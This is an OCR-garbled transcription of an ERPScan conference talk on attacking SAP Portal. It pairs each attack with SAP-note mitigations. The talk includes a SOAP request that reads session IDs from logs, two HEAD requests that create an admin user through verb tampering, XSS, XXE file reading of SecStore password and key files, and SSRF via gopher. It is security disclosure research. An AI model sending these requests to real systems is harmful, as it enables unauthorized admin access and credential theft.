Invest in security to secure investments. Breaking SAP Portal. Alexander Polyakov CTO ERPScan Dmitry Chastuchin - Principal Researcher ERPScan

Transcription

1 Invest in security to secure investments Breaking SAP Portal Alexander Polyakov CTO ERPScan Dmitry Chastuchin - Principal Researcher ERPScan

2 About ERPScan The only 360- degree SAP Security solu8on - ERPScan Security Monitoring Suite for SAP Leader by the number of acknowledgements from SAP ( 150+ ) 60+ presentahons key security conferences worldwide 25 Awards and nominahons Research team - 20 experts with experience in different areas of security Headquarters in Palo Alto (US) and Amsterdam (EU) 2

3 Agenda Say hello to SAP Portal Breaking Portal through SAP Services Breaking Portal through J2EE Engine Breaking Portal through Portal issues Conclusion 3

4 SAP The most popular business applica8on More than customers worldwide 74% of Forbes 500 run SAP 4

5 Meet sapscan.com hup://erpscan.com/wp- content/uploads/2012/06/sap- Security- in- figures- a- global- survey final.pdf 5

6 Say hello to Portal Point of web access to SAP systems Point of web access to other corporate systems Way for auackers to get access to SAP from the Internet ~17 Portals in Switzerland, according to Shodan ~11 Portals in Switzerland, according to Google 6

7 EP architecture 7

8 Okay, okay. SAP Portal is important, and it has many links to other modules. So what? 8

9 SAP Management Console 9

10 SAP Management Console SAP MC provides a common framework for centralized system management Allowing to see the trace and log messages Using JSESSIONID from logs, auacker can log into Portal What we can find into logs? Right! File userinterface.log contains calculated JSESIONID But auacker must have creden8al for reading log file! Wrong! 10

11 SAP Management Console <?xml version="1.0"?> <SOAP- ENV:Envelope xmlns:soap- ENV="hUp://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="hup:// instance" xmlns:xs="hup:// <SOAP- ENV:Header> <sapsess:session xmlns:sapsess="hup:// <enablesession>true</enablesession> </sapsess:session> </SOAP- ENV:Header> <SOAP- ENV:Body> <ns1:readlogfile xmlns:ns1="urn:sapcontrol"> <filename>j2ee/cluster/server0/log/system/userinterface.log</filename> <filter/> <language/> <maxentries>%count%</maxentries> <statecookie>eof</statecookie> </ns1:readlogfile> </SOAP- ENV:Body> </SOAP- ENV:Envelope> 11

12 PrevenHon Don t use TRACE_LEVEL = 3 in produc8on systems or delete traces Install notes and hup://help.sap.com/saphelp_nwpi71/helpdata/en/ d6/49543b1e49bc1fe a114084/frameset.htm 12

13 Single- Sign On 13

14 SSO (old but shll works) SAP implements SSO using the Header Variable Login Module creden8als cookie check okay header_auth AUacker cookie tnx Mariano ;) 14

15 PrevenHon Implement proper network filters to avoid direct connec8ons to SAP J2EE Engine. If you use it for Windows authen8ca8on, switch to SPNegoLoginModule hup://help.sap.com/saphelp_nw73ehp1/helpdata/en/d0/ a3d940c e a1550b0/frameset.htm 15

16 SAP NetWeaver J2EE 16

17 Access control DeclaraHve By WEB.XML ProgrammaHc By UME Web Dynpro Portal iviews J2EE Web apps - programma8c - programma8c - declara8ve 17

18 DeclaraHve access control The central en8ty in the J2EE authoriza8on model is the security role. Programmers define the applica8on- specific roles in the J2EE deployment descriptor web.xml web- j2ee- engine.xml 18

19 Verb Tampering 19

20 web.xml <servlet> <servlet- name>cri8calac8on</servlet- name> <servlet- class>com.sap.admin.cri8cal.ac8on</servlet- class> </servlet> <servlet- mapping> <servlet- name>cri8calac8on</</servlet- name> <url- pauern>/admin/cri8cal</url- pauern> </servlet- mapping <security- constraint> <web- resource- collec8on> <web- resource- name>restrictedaccess</web- resource- name> <url- pauern>/admin/*</url- pauern> <hup- method>get</hup- method> </web- resource- collec8on> <auth- constraint> <role- name>administrator</role- name> </auth- constraint> </security- constraint> 20

21 Verb Tampering If we are trying to get access to an applica8on using GET we need a login:pass and administrator role What if we try to get access to applica8on using HEAD instead GET? PROFIT! Did U know about ctc? 21

22 Verb Tampering Need Admin account in SAP Portal? Just send two HEAD requests Create new user blabla:blabla HEAD /ctc/configservlet?param=com.sap.ctc.u8l.userconfig;createuser;username=blabla,password=blabla Add user blabla to group Administrators HEAD /ctc/configservlet?param=com.sap.ctc.u8l.userconfig;add_user_to_group;username=blabla,groupname=administrators Works when UME uses JAVA database 22

23 PrevenHon Install SAP notes , Install other SAP notes about Verb Tampering Scan applica8ons with ERPScan WEB.XML checker Disable the applica8ons that are not necessary 23

24 Invoker servlet 24

25 web.xml <servlet> <servlet- name>cri>calac>on</servlet- name> <servlet- class>com.sap.admin.cri>cal.ac>on</servlet- class> </servlet> <servlet- mapping> <servlet- name>cri>calac>on</</servlet- name> <url- pabern>/admin/cri>cal</url- pabern> </servlet- mapping <security- constraint> <web- resource- collec>on> <web- resource- name>restrictedaccess</web- resource- name> <url- pabern>/admin/*</url- pabern> <hbp- method>get</hbp- method> <hbp- method>head</hbp- method> </web- resource- collec>on> <auth- constraint> <role- name>administrator</role- name> </auth- constraint> </security- constraint> GET /admin/cri8cal/cri>calac>on GET /servlet/com.sap.admin.cri8cal.ac8on 25

26 Invoker Servlet Want to execute an OS command on J2EE server remotely? Maybe upload a backdoor in a Java class? Or sniff all traffic? SHll remember ctc? 26

27 Invoker Servlet 27

28 PrevenHon Update to the latest patch , EnableInvokerServletGlobally must be false Check all WEB.XML files with ERPScan WEBXML checker 28

29 So, where is Portal? 29

30 SAP Portal User access rights to objects are in the Portal Content Directory (PCD) Based on ACL 2 types of access: (design 8me) for administrators (run8me) for users 30

31 Portal Permission Levels 31

32 End User permission The objects where end user permission is enabled affect the following areas in Portal: All Portal Catalog obj with end user permission Authorized Portal users may access restricted Portal components by URL if they are granted permission in the appropriate security zone. 32

33 Administrator permission Owner = full control + modify permissions Full control = read/write + delete obj Read/Write = read+write+edit proper8es+ add/rem child Write (folders only) = create objects Read = view obj+create instances (delta links and copies) None = access not granted 33

34 Role Assigner permission The Role Assigner permission seyng is available for role objects It allows you to determine which Portal users are permiued to assign other users, groups, or roles to the role principle using the Role Assignment tool 34

35 Security Zones Security zones allow the system administrator to control which Portal components and Portal services a Portal user can launch A security zone specifies the vendor ID, the security area, and safety level for each Portal component and Portal service Why? To group mul>ple iviews easily like files in directories 35

36 Security Zones The security zone is defined in a Portal applica8on descriptor XML file portalapps.xml A Portal component or service can only belong to one security zone Zones allows the administrator to assign permissions to a safety level, instead of assigning them directly Why? To group mul>ple iviews easily like files in directories 36

37 We can get access to Portal iviews using direct URL: /irj/servlet/prt/portal/prtroot/<iview_id> And only Security Zone rights will be checked 37

38 Security Zones So, SecZones offer an extra, but op8onal, layer of code- level security to iviews User- > check end user permission to the role- > view iview User- > check end user permission to the role- > check end user permission to the SecZone - > view iview By default, this func8onality is disabled 38

39 So I wonder how many Portal applica8ons with No\Low Safety exist? 39

40 Safety Levels for Security Zone No Safety Anonymous users are permiued to access portal components defined in the security zone. Low Safety A user must be at least an authen8cated portal user to access portal components defined in the security zone. Medium Safety A user must be assigned to a par8cular portal role that is authorized to access portal components defined in the security zone High Safety A user must be assigned to a portal role with higher administra8ve rights that is authorized to access portal components defined in the security zone. 40

41 Zones with no safety Many custom applica8ons with low security level zone 41

42 PrevenHon Check security zones permissions hup://help.sap.com/saphelp_nw70/helpdata/en/25/85de55a94c4b5fa7a2d74e8ed201b0/frameset.htm hup://help.sap.com/saphelp_nw70/helpdata/en/f6/2604db05fd11d7b c9f7/frameset.htm 42

43 SAP Portal Web based services All OWASP TOP10 actual XSS Phishing Traversal XXE 43

44 EPCF 44

45 XSS Many XSSs in Portal But some8mes huponly But when we exploit XSS, we can use the features of SAP Portal 45

46 EPCF EPCF provides a JavaScript API designed for the client- side communica8on between portal components and the portal core framework Enterprise Portal Client Manager (EPCM) iviews can access the EPCM object from every portal page or IFrame Every iview contains the EPCM object For example, EPCF used for transient user data buffer for iviews <SCRIPT> alert(epcm.loadclientdata("urn:com.sap.myobjects", "person"); </SCRIPT> 46

47 PrevenHon Install SAP note

48 KM Phishing SAP Knowledge Management may be used to create phishing pages 48

49 FIX 49

50 Directory traversal 50

51 Directory traversal fix bypass 51

52 PrevenHon Install SAP note

53 Cut the Crap, Show Me the Hack 53

54 Breaking SAP Portal Found a file in the OS of SAP Portal with the encrypted passwords for administra8on and DB Found a file in the OS of SAP Portal with keys to decrypt passwords Found a vulnerability (another one ;)) which allows reading the files with passwords and keys Decrypt passwords and log into Portal PROFIT! 54

55 Read file How we can read the file? Directory Traversal OS Command execute XML External En8ty (XXE) 55

56 XXE in Portal 56

57 XXE in Portal 57

58 XXE Error based XXE 58

59 Breaking SAP Portal Ok, we can read files Where are the passwords? The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here: \usr\sap\<sid>\sys\global\security\data\secstore.proper>es 59

60 Where are the passwords? (config.proper4es) rdbms.maximum_connec8ons=5 system.name=ttt secstorefs.keyfile=/oracle/ttt/sapmnt/global/security/data/ SecStore.key secstorefs.secfile=/oracle/ttt/sapmnt/global/security/data/ SecStore.proper8es secstorefs.lib=/oracle/tttsapmnt/global/security/lib rdbms.driverloca8on=/oracle/client/10x_64/instantclient/ ojdbc14.jar rdbms.connec8on=jdbc/pool/ttt rdbms.ini8al_connec8ons=1 60

61 Where are the passwords? (config.proper4es) rdbms.maximum_connec8ons=5 system.name=ttt secstorefs.keyfile=/oracle/ttt/sapmnt/global/security/data/secstore.key secstorefs.secfile=/oracle/ttt/sapmnt/global/security/data/secstore.proper8es secstorefs.lib=/oracle/tttsapmnt/global/security/lib rdbms.driverloca8on=/oracle/client/10x_64/instantclient/ojdbc14.jar rdbms.connec8on=jdbc/pool/ttt rdbms.ini8al_connec8ons=1 61

62 But where is the key? 62

63 SecStore.properHes $internal/version=ni4zff4wmseaseforccmxegafx admin/host/ttt=7kjuopps/+u +14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS admin/password/ttt=7kjuopps/+uv+14j56vdc7m7v7dytbgbkgqdp +QD04b0Fh jdbc/pool/ttt=7kjuopps/+u5jm6s1cvvgq1gzfvarxuuzejthtji0vgegh admin/port/ttt=7kjuopps/+u+1j4vd1cv6ztvd336rzed7267rwr4zugrtq $internal/check=bjrrz eua+bw4xczdz16zx78u t $internal/mode=encrypted admin/user/ttt=7kjuopps/+u +14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E 63

64 config.properhes rdbms.maximum_connec8ons=5 system.name=ttt secstorefs.keyfile=/oracle/ttt/sapmnt/global/security/data/secstore.key secstorefs.secfile=/oracle/ttt/sapmnt/global/security/data/secstore.proper8es secstorefs.lib=/oracle/tttsapmnt/global/security/lib rdbms.driverloca8on=/oracle/client/10x_64/instantclient/ojdbc14.jar rdbms.connec8on=jdbc/pool/ttt rdbms.ini8al_connec8ons=1 64

65 Get the password We have an encrypted password We have a key to decrypt it We got the J2EE admin and JDBC login:password! 65

66 PrevenHon Install SAP note Restrict read access to files SecStore.proper>es and SecStore.key 66

67 Portal post exploitahon Lot of links to other systems in corporate LAN Using SSRF, auackers can get access to these systems What is SSRF? 67

68 SSRF History: Basics We send Packet A to Service A Service A ini8ates Packet B to service B Services can be on the same or different hosts We can manipulate some fields of packet B within packet A Various SSRF auacks depend on how many fields we can control on packet B Packet A Packet B 68

69 ParHal Remote SSRF: HTTP afacks on other services Direct auack GET /vuln.jsp Corporate network HTTP Server SSRF AUack Get /vuln.jst SSRF AUack A B 69

70 Gopher uri scheme Using gopher:// uri scheme, it is possible to send TCP packets Exploit OS vulnerabili8es Exploit old SAP applicahon vulnerabilihes Bypass SAP security restric8ons Exploit vulnerabili8es in local services More info in our BH2012 presenta8on: SSRF vs. Business Cri>cal Applica>ons hup://erpscan.com/wp- content/uploads/2012/08/ssrf- vs- Businness- cri8cal- applica8ons- whitepaper.pdf 70

71 Portal post- exploitahon 71

72 Conclusion It is possible to protect yourself from these kinds of issues, and we are working close with SAP to keep customers secure SAP Guides Regular security assessments Monitoring technical security ABAP code review SegregaHon of DuHes It s all in your hands 72

73 Future work Many of the researched issues cannot be disclosed now because of our good rela>onship with SAP Product Security Response Team, whom I would like to thank for coopera>on. However, if you want to be the first to see new abacks and demos, follow us and abend future presenta>ons: December 6 BlackHat (UAE, Abu Dhabi) December 13 Syscan 360 (Beijing, China) 73

74 Web: e- mail: @_chipik 74